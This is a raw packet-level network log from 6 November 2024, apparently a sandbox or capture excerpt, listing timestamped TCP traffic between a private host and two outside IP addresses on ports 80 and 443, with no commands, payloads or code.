                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.297990084 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.297993898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298006058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298017025 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298019886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298027992 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298027992 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298043966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298054934 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298062086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298077106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298090935 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298091888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298106909 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298109055 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298120022 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298131943 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298135042 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298144102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298156977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298168898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298171997 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298182011 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298186064 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298192024 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298209906 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298213959 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298228979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298240900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298249960 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298254967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298266888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298279047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298284054 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298290014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298300982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298305035 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298311949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298316956 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298324108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298341036 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298343897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298362017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298373938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298382044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298384905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298398018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298407078 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298410892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298424006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298434973 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298435926 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298448086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298454046 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298460960 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298470974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298480988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298485994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298496008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298502922 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298521042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298536062 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298537970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298551083 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298562050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298573017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298577070 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298583984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298593044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298593998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298607111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298609018 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298623085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298639059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298650026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298657894 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298661947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298675060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298676014 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298686981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298697948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298703909 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298707962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298722029 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298727036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298736095 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298747063 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298759937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298769951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298779964 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298783064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298794985 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298805952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298806906 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298825026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298825979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298839092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298851967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298861980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298866034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298877954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298885107 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298897982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298909903 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298913956 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298921108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298938990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298942089 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298949003 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298960924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298964024 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298974037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298985958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.298993111 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299000978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299012899 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299022913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299025059 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299035072 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299042940 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299048901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299061060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299072027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299072027 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299084902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299097061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299099922 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299108982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299113989 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299120903 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299132109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299144030 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299149036 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299155951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299165964 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299170017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299182892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299185991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299213886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299251080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299262047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299274921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299287081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299292088 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299300909 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299320936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299330950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299335957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299351931 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299384117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299396038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299406052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299417019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299422026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299429893 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299431086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299452066 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299468994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299468994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299485922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299498081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299504042 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299510956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299523115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299526930 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299534082 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299547911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299557924 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299560070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299571991 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299576044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299588919 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299604893 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299608946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299624920 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299638987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299649000 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299652100 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299664021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299674988 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299681902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299694061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299699068 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299710989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299721956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299730062 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299752951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299761057 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299766064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299784899 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299799919 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299801111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299813986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299835920 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299911022 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299926043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299937010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299943924 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299949884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299968958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299972057 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299985886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.299998999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300002098 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300009966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300046921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300048113 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300071001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300081968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300088882 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300092936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300115108 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300124884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300137043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300147057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300158978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300165892 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300170898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300189018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300194979 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300199986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300205946 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300216913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300234079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300239086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300246954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300263882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300275087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300280094 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300287962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300295115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300301075 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300312042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300326109 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300328970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300343990 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300771952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300786018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300806046 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300826073 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300843000 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.300862074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.327792883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.327806950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.327837944 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330770969 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330805063 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330851078 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330858946 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330885887 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.330904007 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.350898027 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.350917101 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.350963116 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.350969076 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.350997925 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.351010084 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.352592945 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.352611065 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.352665901 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.352678061 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.352715969 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.354599953 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.354618073 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.354667902 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.354675055 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.354712963 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355559111 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355581045 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355617046 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355627060 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355643988 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.355660915 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.357280016 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.357302904 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.357347012 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.357352972 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.357424021 CET49720443192.168.2.513.107.246.45
